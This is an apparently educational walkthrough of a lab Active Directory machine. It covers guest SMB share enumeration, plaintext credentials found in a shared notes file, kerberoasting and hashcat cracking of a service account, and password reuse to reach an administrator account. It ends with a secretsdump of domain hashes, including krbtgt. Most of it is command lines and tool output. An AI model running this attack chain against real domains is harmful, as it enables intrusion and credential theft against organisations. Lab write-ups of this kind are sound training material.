Overview
The machine starts by enumerating SMB shares with guest access that reveals credentials for mprice, kerberoasting a service account to crack its password, and password reuse to an administrator account to dump domain hashes.
An adult beverage company "Martini Bars" recently had a corporate breach and the compliance and risk team dictates they perform a penetration test at one of their branch offices. The Hack Smarter team has been authorized to perform an internal black box pentest.
The client has provided you with VPN access to their internal network, but no credentials.
Enumeration
we start with nmap scan
┌─[192.168.37.140]─[jimmex@attacker]─[~/HSM/martiniAD]
└──╼ [★]$ nmap -sC -sV -vv -oA init 10.1.240.18 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2026-08-21 04:35 EDT
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:35
Completed NSE at 04:35, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:35
Completed NSE at 04:35, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:35
Completed NSE at 04:35, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 04:35
Completed Parallel DNS resolution of 1 host. at 04:35, 6.61s elapsed
Initiating Connect Scan at 04:35
Scanning 10.1.240.18 [1000 ports]
Discovered open port 139/tcp on 10.1.240.18
Discovered open port 445/tcp on 10.1.240.18
Discovered open port 53/tcp on 10.1.240.18
Discovered open port 3389/tcp on 10.1.240.18
Discovered open port 135/tcp on 10.1.240.18
Discovered open port 3268/tcp on 10.1.240.18
Discovered open port 3269/tcp on 10.1.240.18
Discovered open port 464/tcp on 10.1.240.18
Discovered open port 636/tcp on 10.1.240.18
Discovered open port 593/tcp on 10.1.240.18
Discovered open port 5985/tcp on 10.1.240.18
Discovered open port 389/tcp on 10.1.240.18
Discovered open port 88/tcp on 10.1.240.18
Completed Connect Scan at 04:35, 12.32s elapsed (1000 total ports)
Initiating Service scan at 04:35
Scanning 13 services on 10.1.240.18
Completed Service scan at 04:36, 15.06s elapsed (13 services on 1 host)
NSE: Script scanning 10.1.240.18.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:36
NSE Timing: About 99.94% done; ETC: 04:36 (0:00:00 remaining)
Completed NSE at 04:36, 40.25s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:36
Completed NSE at 04:36, 4.68s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:36
Completed NSE at 04:36, 0.00s elapsed
Nmap scan report for 10.1.240.18
Host is up, received user-set (0.17s latency).
Scanned at 2026-08-21 04:35:35 EDT for 72s
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2026-08-21 08:35:52Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: DRY.MARTINI.BARS0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: DRY.MARTINI.BARS0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3389/tcp open ms-wbt-server syn-ack
| _ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.DRY.MARTINI.BARS
| Issuer: commonName=DC01.DRY.MARTINI.BARS
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-08-20T08:31:42
| Not valid after: 2027-02-19T08:31:42
| MD5: 458b:8ec7:9871:c7e4:788b:87ed:50d2:8e03
| SHA-1: 180f:1351:7739:3c41:e32b:827c:0ff5:d13c:75c0:e699
| -----BEGIN CERTIFICATE-----
| MIIC7jCCAdagAwIBAgIQFI2B3y16VIdGWCYHyi/pKzANBgkqhkiG9w0BAQsFADAg
| MR4wHAYDVQQDExVEQzAxLkRSWS5NQVJUSU5JLkJBUlMwHhcNMjYwODIwMDgzMTQy
| WhcNMjcwMjE5MDgzMTQyWjAgMR4wHAYDVQQDExVEQzAxLkRSWS5NQVJUSU5JLkJB
| UlMwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCj8zFoUKBSey8zWsOe
| h7qxLQstSxB5MF5HtlBrVragvCsxVxfsO8Ywsnu5fvVszmddGJmsd63i0seUWI1w
| tn6/2ttiUFGsXh3ivlqxbWQLVJf1QgYEz5O7hJLFIsc6/4uyhvoy2ugYdi3BOK5D
| mwjbby4A2XxMs/zgvsnYSEtrQvagfSAWWPIMdsdMrh5xCTYUWWryKi/10Inv3vZ9
| nDObUQKgEVU1atsZq56O8L+YC1qxZlEkL8Qb1No5cetXeOLBjf7IuRnwLyFygvig
| krFHvGiIv/4AqFgYcquFxKwGTx/yxqkjMvCcoVAKfPtii2QtPMwXc47rTYvJxOMF
| dohBAgMBAAGjJDAiMBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDAN
| BgkqhkiG9w0BAQsFAAOCAQEAYVCK8X2I8eUiyIqoipH5SitlgVeeqenS325OBpy5
| WaSE5qrzKAcifsCCeio81xHuTsGeMVZ8H3k+180n0c1lf7S5TBOZfvCyoTGh3rQI
| 1magpW1wCopClCMCf59ezKLNEm0jlG4tGpUcbYjYhAOCO6+O6kKIRrYyt4eYMOH9
| YQVU701Wbics2NC2XHiMTTdaMpeoKnpo0H/gQJGdExdXB7JKyhhGIF/rlQ6YpqdO
| Z13POYN4U1y0dQ95+PLPkOoh9yEuCiniOVBkwrLp0tedE+W1DA5WYeAAGZpPm8Q2
| sHgjbT271UxAIpy/OtxlAlNOm/D5THNajPk3kn4D6X+DKA==
| _-----END CERTIFICATE-----
| rdp-ntlm-info:
| Target_Name: DRY
| NetBIOS_Domain_Name: DRY
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: DRY.MARTINI.BARS
| DNS_Computer_Name: DC01.DRY.MARTINI.BARS
| Product_Version: 10.0.26100
| _ System_Time: 2026-08-21T08:36:02+00:00
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| _http-server-header: Microsoft-HTTPAPI/2.0
| _http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi
?new-service :
SF-Port3389-TCP:V=7.95%I=7%D=8/21%Time=6A880DEE%P=x86_64-pc-linux-gnu%r(Te
SF:rminalServerCookie,13,"\x03\0\0\x13\x0e\xd0\0\0\x124\0\x02\?\x08\0\x02\
SF:0\0\0");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 25668/tcp): CLEAN (Timeout)
| Check 2 (port 17394/tcp): CLEAN (Timeout)
| Check 3 (port 61072/udp): CLEAN (Timeout)
| Check 4 (port 44500/udp): CLEAN (Timeout)
| _ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
| _ Message signing enabled but not required
| _clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time:
| date: 2026-08-21T08:36:06
| _ start_date: N/A
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:36
Completed NSE at 04:36, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:36
Completed NSE at 04:36, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:36
Completed NSE at 04:36, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.03 seconds
SMB
First thing to look for is the SMB Guest account, if it is enabled and we're allowed to list shares or even better having access to one of them would be good
as you can see the share is enabled and we can read/write to the share notes
┌─[192.168.37.140]─[jimmex@attacker]─[~/HSM/martiniAD]
└──╼ [★]$ nxc smb dry.martini.bars -u 'Guest' -p '' --shares
SMB 10.1.240.18 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:DRY.MARTINI.BARS) (signing:False) (SMBv1:
False) (Null Auth:True) (DC:True)
SMB 10.1.240.18 445 DC01 [+] DRY.MARTINI.BARS\Guest:
SMB 10.1.240.18 445 DC01 [*] Enumerated shares
SMB 10.1.240.18 445 DC01 Share Permissions Remark
SMB 10.1.240.18 445 DC01 ----- ----------- ------
SMB 10.1.240.18 445 DC01 ADMIN$ Remote Admin
SMB 10.1.240.18 445 DC01 C$ Default share
SMB 10.1.240.18 445 DC01 IPC$ READ Remote IPC
SMB 10.1.240.18 445 DC01 NETLOGON Logon server share
SMB 10.1.240.18 445 DC01 notes READ,WRITE
SMB 10.1.240.18 445 DC01 SYSVOL Logon server share
there isn't a lot here, just a file called notes. so let's see if it leaks anything sensitive, before we move on the abusing the write access
┌─[192.168.37.140]─[jimmex@attacker]─[~/HSM/martiniAD]
└──╼ [★]$ smbclient.py dry.martini.bars/Guest:''@10.1.240.18
Impacket v0.14.0.dev0+20260814.164800.c23b3d55 - Copyright Fortra, LLC and its affiliated companies
Password:
Type help for list of commands
# use notes
# ls
drw-rw-rw- 0 Tue Jan 20 13:11:00 2026 .
drw-rw-rw- 0 Sat Jan 17 11:38:33 2026 ..
-rw-rw-rw- 129 Tue Jan 20 13:11:00 2026 notes.txt
# get notes.txt
# exit
looking at the file, it has a credentials for the user mprice
┌─[192.168.37.140]─[jimmex@attacker]─[~/HSM/martiniAD]
└──╼ [★]$ cat notes.txt
- Order more gin for lakeside
- Look for an engagement ring
- Check that notes works from Linux Mint
creds
Access as mprice
validating the user against ldap
mprice:*martini*┌─[192.168.37.140]─[jimmex@attacker]─[~/HSM/martiniAD]
(failed reverse-i-search)`': xc^C
┌─[192.168.37.140]─[jimmex@attacker]─[~/HSM/martiniAD]
└──╼ [★]$ nxc ldap dry.martini.bars -u 'mprice' -p '*martini*'
LDAP 10.1.240.18 389 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:DRY.MARTINI.BARS) (signing:Enforced) (channel
binding:No TLS cert)
LDAP 10.1.240.18 389 DC01 [+] DRY.MARTINI.BARS\mprice:*martini*
with a valid domain creds we can start collecting data for bloodhound, but for some reason it fails asking for a better security measures.
┌─[192.168.37.140]─[jimmex@attacker]─[~/HSM/martiniAD]
└──╼ [★]$ rusthound -i 10.1.240.18 -u mprice -p '*martini*' -d dry.martini.bars -z
---------------------------------------------------
Initializing RustHound at 04:40:53 on 08/21/26
Powered by g0h4n from OpenCyber
---------------------------------------------------
[2026-08-21T08:40:53Z INFO rusthound] Verbosity level: Info
[2026-08-21T08:40:53Z ERROR rusthound::ldap] Failed to authenticate to DRY.MARTINI.BARS Active Directory. Reason: LDAP operation result: rc=8 (strongerAuthReq
uired), dn: "", text: "00002028: LdapErr: DSID-0C090347, comment: The server requires binds to turn on integrity checking if SSL\TLS are not already active on
the connection, data 0, v65f4"
even after using
--ldapsoption for secure ldap it still failed which is weird, cause if the auth was the issue then nxc wouldn't work in the first place (specially that'll use it to do actual LDAP queries later and it still works) but it looked like intended behavior from the author to me so decided to move on
Access as Athena_SVC
we have to go blind in this environment, first thing to look for is there is any kerberostable accounts
Kerberoasting is a post-exploitation attack in Active Directory where an authenticated user requests a Kerberos service ticket (TGS) for a Service Principal Name (SPN). Because part of the ticket is encrypted with the target service account's password hash, the attacker can export and crack it offline using brute-force tools to steal plaintext credentials
one user has an SPN listed to his account, so we get a hash.
┌─[192.168.37.140]─[jimmex@attacker]─[~/HSM/martiniAD]
└──╼ [★]$ nxc ldap dry.martini.bars -u 'mprice' -p '*martini*' --kerberoast kerberoast.out
LDAP 10.1.240.18 389 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:DRY.MARTINI.BARS) (signing:Enforced) (channel
binding:No TLS cert)
LDAP 10.1.240.18 389 DC01 [+] DRY.MARTINI.BARS\mprice:*martini*
LDAP 10.1.240.18 389 DC01 [*] Skipping disabled account: krbtgt
LDAP 10.1.240.18 389 DC01 [*] Total of records returned 1
LDAP 10.1.240.18 389 DC01 [*] sAMAccountName: ATHENA_SVC, memberOf: ['CN=Remote Management Users,CN=Builtin,DC=DRY,DC=MARTINI,DC=BAR
S', 'CN=Remote Desktop Users,CN=Builtin,DC=DRY,DC=MARTINI,DC=BARS' ], pwdLastSet: 2026-01-20 13:20:32.856622, lastLogon: < never>
LDAP 10.1.240.18 389 DC01 $krb5tgs$23$*ATHENA_SVC$DRY.MARTINI.BARS$DRY.MARTINI.BARS\ATHENA_SVC*$8a4fb656c86a33b48b93eb44764b767d$605
28ea190fd7a0f0a3806473e74c6ba7648098917a74d5cf8afebac54b3e81f41ad02d25a9eb08f5588a073e9f0b1f337008d7e8796a8efe0780e34fab2f6049baa69a1720e047fb7199177625b9fcb3
288c07b1881fc6578f2b8677c237ecf3ac3cf83b80c2a5ecd9ab9ff5ecbd4db1dbf2bb645dedb48865a92aad5cbe090059ae35d1849a240a897dc388cf326be58d4a742d7746af8bafa83d53752aaa
bab9d93b54b3e1a8e3c249ad1e857f71fa6a306b7becda60b58dc5e49e8cbabfc7b38c33f3fbe99b1214c27e115c64924d8540ea3d121ca465fc727d2c31a97bd9a82c9a51c4a04b68a72c8a491485
5ea34a15daceec013685233f1d79fc37972ed536b3d56445be3820086331c1d38c5fcd29dcff714b74573aad06abb174adc51eddd13124551e8481f403b5ef7b9ae192622f84cfa420187db75df3c9
6f5480cdae9b8a8b7e2df8eaaf601a8e284f5c3ee91f71d540fd20ff4926e9e5897702b3f1a54b3a88c224e948917bff5eb4dac679b2da1809b40b52d75c84ddb2fc9f690110b7fe6572bddc60b51d
49851888931ccf4f0c53ff86edb947ae771b34f5b6469f82855d3413911391557ffdbc233b694f23053697f7ab8b584ecda4a7af2b98552b8ff441df72b8cb5a51b0307c990fb45393e4657d4c0d3a
47305ede01f46ffa25c3ca24ecb5243e03368984e0f750201f69ec1dfded4ba91dfafe10ab3ea167bfa902fd933a8133f69a24c6ab33b72dbf7b747a674d699170e88ce5762df2befab861e7f324dd
0fc96cb7ee08ed7434a816e1f5ef782e935f03637a6ca9e2cbb14f6d2bcffce1c58f270219d2b571c9c23f02750e7d29734ad1b619d17e41854fbbd4ef9747b33c380fd4d04321e08c1d57bc97853a
a38350363426f055e7eec698897c7140a60331ba11db85bf22372f78b893ea7df7ac598423e361e08610eb37e95fbea186e5e70f2aa20435a1933a556e65b2195e200c954dee2285cab59f9d4789e0
cc9f7d82519fcf5794a0b8ea39ab57a561172ac5817d59c4b9e2d3db7da12698fb0f735572c898dd7a0e40dc2343bfe4ff010e90273853b145e494d7e650ac39d58a98c0b46527f2c1456d7de60adb
2002bb16669f449228c622d379a30a425f76baf7f52bce16f7cc2796d41fe3acbcbfffa23421c56fa56fbb45323f97fdc7f0e5a7363dbd6443132aa0577077b01d4704c73ba8bd0e71332cc8235e0a
dc61a8a68df2de23ccdc776cb3b741b26cab60861baae919b6f46a1fb919780afff14bd1b9785a0457d2606a57eac32966b0512f100a98cb198f00a0877d9228395e45066dc11c3135f6bc1631fc2b
b107dd86ab211f9d9360a8e1d309b106171476196ed88ca17a43292717f18a97b4bbad8c26ecfca8fcf494822bae6822591b4ed5e1a6eb1b84e44bbfd2f76029a1373cdd98c7d79ad5591ed90ea1d6
3cf7c8520aa5d3dcd0ebba608ee175a278bfe740381e568a8057c2ddfd5ac5af0ef17680791cd02eb4f8a
trying to crack the hash using hashcat returned the password for the user athena_svc
┌─[192.168.37.140]─[jimmex@attacker]─[~/HSM/martiniAD]
└──╼ [★]$ hashcat -a 0 -m 13100 kerberoast.out /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #1: cpu-haswell-Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz, 2176/4417 MB (1024 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
$krb5tgs$23$*ATHENA_SVC$DRY.MARTINI.BARS$DRY.MARTINI.BARS\ATHENA_SVC*$8a4fb656c86a33b48b93eb44764b767d$60528ea190fd7a0f0a3806473e74c6ba7648098917a74d5cf8afeba
c54b3e81f41ad02d25a9eb08f5588a073e9f0b1f337008d7e8796a8efe0780e34fab2f6049baa69a1720e047fb7199177625b9fcb3288c07b1881fc6578f2b8677c237ecf3ac3cf83b80c2a5ecd9ab
9ff5ecbd4db1dbf2bb645dedb48865a92aad5cbe090059ae35d1849a240a897dc388cf326be58d4a742d7746af8bafa83d53752aaabab9d93b54b3e1a8e3c249ad1e857f71fa6a306b7becda60b58d
c5e49e8cbabfc7b38c33f3fbe99b1214c27e115c64924d8540ea3d121ca465fc727d2c31a97bd9a82c9a51c4a04b68a72c8a4914855ea34a15daceec013685233f1d79fc37972ed536b3d56445be38
20086331c1d38c5fcd29dcff714b74573aad06abb174adc51eddd13124551e8481f403b5ef7b9ae192622f84cfa420187db75df3c96f5480cdae9b8a8b7e2df8eaaf601a8e284f5c3ee91f71d540fd
20ff4926e9e5897702b3f1a54b3a88c224e948917bff5eb4dac679b2da1809b40b52d75c84ddb2fc9f690110b7fe6572bddc60b51d49851888931ccf4f0c53ff86edb947ae771b34f5b6469f82855d
3413911391557ffdbc233b694f23053697f7ab8b584ecda4a7af2b98552b8ff441df72b8cb5a51b0307c990fb45393e4657d4c0d3a47305ede01f46ffa25c3ca24ecb5243e03368984e0f750201f69
ec1dfded4ba91dfafe10ab3ea167bfa902fd933a8133f69a24c6ab33b72dbf7b747a674d699170e88ce5762df2befab861e7f324dd0fc96cb7ee08ed7434a816e1f5ef782e935f03637a6ca9e2cbb1
4f6d2bcffce1c58f270219d2b571c9c23f02750e7d29734ad1b619d17e41854fbbd4ef9747b33c380fd4d04321e08c1d57bc97853aa38350363426f055e7eec698897c7140a60331ba11db85bf2237
2f78b893ea7df7ac598423e361e08610eb37e95fbea186e5e70f2aa20435a1933a556e65b2195e200c954dee2285cab59f9d4789e0cc9f7d82519fcf5794a0b8ea39ab57a561172ac5817d59c4b9e2
d3db7da12698fb0f735572c898dd7a0e40dc2343bfe4ff010e90273853b145e494d7e650ac39d58a98c0b46527f2c1456d7de60adb2002bb16669f449228c622d379a30a425f76baf7f52bce16f7cc
2796d41fe3acbcbfffa23421c56fa56fbb45323f97fdc7f0e5a7363dbd6443132aa0577077b01d4704c73ba8bd0e71332cc8235e0adc61a8a68df2de23ccdc776cb3b741b26cab60861baae919b6f4
6a1fb919780afff14bd1b9785a0457d2606a57eac32966b0512f100a98cb198f00a0877d9228395e45066dc11c3135f6bc1631fc2bb107dd86ab211f9d9360a8e1d309b106171476196ed88ca17a43
292717f18a97b4bbad8c26ecfca8fcf494822bae6822591b4ed5e1a6eb1b84e44bbfd2f76029a1373cdd98c7d79ad5591ed90ea1d63cf7c8520aa5d3dcd0ebba608ee175a278bfe740381e568a8057
c2ddfd5ac5af0ef17680791cd02eb4f8a:1dirtymartini
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ATHENA_SVC$DRY.MARTINI.BARS$DRY.MARTIN...eb4f8a
Time.Started.....: Fri Aug 21 04:45:30 2026 (28 secs)
Time.Estimated...: Fri Aug 21 04:45:58 2026 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 501.2 kH/s (1.37ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 13022208/14344385 (90.78%)
Rejected.........: 0/13022208 (0.00%)
Restore.Point....: 13021184/14344385 (90.78%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 1dog0cats -> 1deaxianaya
Hardware.Mon.#1..: Util: 85%
Started: Fri Aug 21 04:44:49 2026
Stopped: Fri Aug 21 04:46:00 2026
validating the user against ldap
┌─[192.168.37.140]─[jimmex@attacker]─[~/HSM/martiniAD]
└──╼ [★]$ nxc ldap dry.martini.bars -u 'athena_svc' -p '1dirtymartini'
LDAP 10.1.240.18 389 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:DRY.MARTINI.BARS) (signing:Enforced) (channel
binding:No TLS cert)
LDAP 10.1.240.18 389 DC01 [+] DRY.MARTINI.BARS\athena_svc:1dirtymartini
At this point, I wanted to start looking for writable objects using bloodyAD and run dacledit to read DACLs but I wanted to know what are the groups on the box, users, service accounts, etc just to know what to query exactly and what to look for but when I did get a list of users I found another user called athena.t0
┌─[192.168.37.140]─[jimmex@attacker]─[~/HSM/martiniAD]
└──╼ [★]$ nxc ldap dry.martini.bars -u 'athena_svc' -p '1dirtymartini' --users
LDAP 10.1.240.18 389 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:DRY.MARTINI.BARS) (signing:Enforced) (channel
binding:No TLS cert)
LDAP 10.1.240.18 389 DC01 [+] DRY.MARTINI.BARS\athena_svc:1dirtymartini
LDAP 10.1.240.18 389 DC01 [*] Enumerated 6 domain users: DRY.MARTINI.BARS
LDAP 10.1.240.18 389 DC01 -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.1.240.18 389 DC01 Administrator 2026-01-12 11:00:19 2 Built-in account for administering the computer
/domain
LDAP 10.1.240.18 389 DC01 Guest < never> 0 Built-in account for guest access to the comput
er/domain
LDAP 10.1.240.18 389 DC01 krbtgt 2026-01-16 20:19:20 0 Key Distribution Center Service Account
LDAP 10.1.240.18 389 DC01 mprice 2026-01-17 11:40:55 0
LDAP 10.1.240.18 389 DC01 athena.t0 2026-01-20 13:20:44 0
LDAP 10.1.240.18 389 DC01 ATHENA_SVC 2026-01-20 13:20:32 0
Access as Athena.t0
Most of the users reuse their password, and because both accounts looked like they belong to Athena I suspected password reuse (in actual pentesting you password spray all the time even if you don't suspect anything nothing wrong with that)
So I tried to reuse athena_svc account's password with athena.t0 and it was actually valid, but the surprise that the user athena.t0 is an administrator meaning we can do whatever we need here.
┌─[192.168.37.140]─[jimmex@attacker]─[~/HSM/martiniAD]
└──╼ [★]$ nxc ldap dry.martini.bars -u 'athena.t0' -p '1dirtymartini'
LDAP 10.1.240.18 389 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:DRY.MARTINI.BARS) (signing:Enforced) (channel
binding:No TLS cert)
LDAP 10.1.240.18 389 DC01 [+] DRY.MARTINI.BARS\athena.t0:1dirtymartini (Pwn3d!)
starting with domain credentials dump using secretsdump.py we dump the entire domain hashes
┌─[192.168.37.140]─[jimmex@attacker]─[~/HSM/martiniAD]
└──╼ [★]$ secretsdump.py dry.martini.bars/athena.t0:1dirtymartini@10.1.240.18
Impacket v0.14.0.dev0+20260814.164800.c23b3d55 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xb2f01e3e3c1aa452de55002fbe88214a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:920ae267e048417fcfe00f49ecbd4b33:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
DRY\DC01$:aes256-cts-hmac-sha1-96:cfdd5f8fcded79093957c01af085cdfa0ae934a027dbb8638e98564e56d43330
DRY\DC01$:aes128-cts-hmac-sha1-96:99d7889b6c8f96d5351f6390d8f8c33a
DRY\DC01$:des-cbc-md5:239451b9cd01cd13
DRY\DC01$:plain_password_hex:3900550034005900670062003900360070004f0059006e00660036002b0044004800620046002b00690068004400790056005a004f0041006800480046007a005
5004c00470054006e006b006c006f007a004200410074004f00420059007100680052006d006f0037004d003d006100610050004600470053007700620044006600630070004400550033005100550
033007300720046003600730043006500470074004400540044004400640056002b006700620059004e0031005a004b003100450063004500430031004e006f004b00650051007200760061004e003
700680072004300710042006a0033004a006d00350054004f00490044006100780032006f004f00750076007000760051004b0064004d0052002b0058006a00480052006b003d006c0048004d00370
04e00640042006c0077006c0042006200620068006c0078006400430062003300640036003600780073006800380031007100480056004e0045004a0063003200510068007a0053004900660063004
9006200430031004900670063004f004b003700780054007800750054006d006300660034006900490057007500680064006c005100500051005200690064004e0077004a00510046002b003100590
057003600490062007000440063005a0072004e004b006a0054007a004a0051007500590075003d005400450075004e0039006300
DRY\DC01$:aad3b435b51404eeaad3b435b51404ee:bc793bbfe2d1082e8f82d89205cccc65:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xf2a16bffe9821b781c11e6abc7c86537a314dcbb
dpapi_userkey:0xf6f64677bd9484d59e36c9a2b933b81d16c3f5c9
[*] NL$KM
0000 D6 F9 1E BE 20 95 21 6A 88 22 1F 5C 92 CE 2C 8A .... .!j.".\..,.
0010 BB CF 2C 38 59 53 A4 3A EF A0 03 DA EA A5 A8 CF ..,8YS.:........
0020 0E 6F 91 92 02 3E 5B 45 40 E2 C7 A8 D5 DA 8B 11 .o...>[E@.......
0030 6D 77 6B 5F 3F 78 48 12 0F BF A8 CE 06 C2 C6 7C mwk_?xH........|
NL$KM:d6f91ebe2095216a88221f5c92ce2c8abbcf2c385953a43aefa003daeaa5a8cf0e6f9192023e5b4540e2c7a8d5da8b116d776b5f3f7848120fbfa8ce06c2c67c
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d5cad8a9782b2879bf316f56936f1e36:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:22ebc290e67668629c8d0812662a9c51:::
DRY.MARTINI.BARS\mprice:1104:aad3b435b51404eeaad3b435b51404ee:821e97e217ddc6e433ac92e0b92955fc:::
DRY.MARTINI.BARS\athena.t0:1105:aad3b435b51404eeaad3b435b51404ee:5f4ae3ddff03f730dd0f1ab97f5849eb:::
DRY.MARTINI.BARS\ATHENA_SVC:1106:aad3b435b51404eeaad3b435b51404ee:5f4ae3ddff03f730dd0f1ab97f5849eb:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:bc793bbfe2d1082e8f82d89205cccc65:::
[*] Kerberos keys grabbed
Administrator:0x14:99a71052cd68e924eec9cf8a584d87e078ffad22fb2e33afc922404b0f4d87d7
Administrator:0x13:36ebe3323c3bf7178d5d89ebc0e3f1b3
Administrator:aes256-cts-hmac-sha1-96:ab535f3a35d406cd9a2ab55e4b5ac037b1bcf6ff7c0fe70cc5e3fd05eb7e85e9
Administrator:aes128-cts-hmac-sha1-96:46a8a37a5f4c1da2f17e36965dd6561d
Administrator:0x17:d5cad8a9782b2879bf316f56936f1e36
krbtgt:aes256-cts-hmac-sha1-96:b2679af0c2283eff6926eda9fcdac99c7bc2b118158df3934a33d5f4f50baed3
krbtgt:aes128-cts-hmac-sha1-96:bfb79c68ae71254e572fd65dd34f5b5c
krbtgt:0x17:22ebc290e67668629c8d0812662a9c51
DRY.MARTINI.BARS\mprice:0x14:3b3563e3bdc4cce3220d51867bbcb8d830a840ae78432e0722b545da9f401164
DRY.MARTINI.BARS\mprice:0x13:a2e065848dc2faecefa27d335cd5ebfc
DRY.MARTINI.BARS\mprice:aes256-cts-hmac-sha1-96:092d7fc4f6b1222436778e6bb6eccd5b82d4e2b5312c276f7a6c53afe5061846
DRY.MARTINI.BARS\mprice:aes128-cts-hmac-sha1-96:0063cbe70b3626bb09b5b26dfabe040f
DRY.MARTINI.BARS\mprice:0x17:821e97e217ddc6e433ac92e0b92955fc
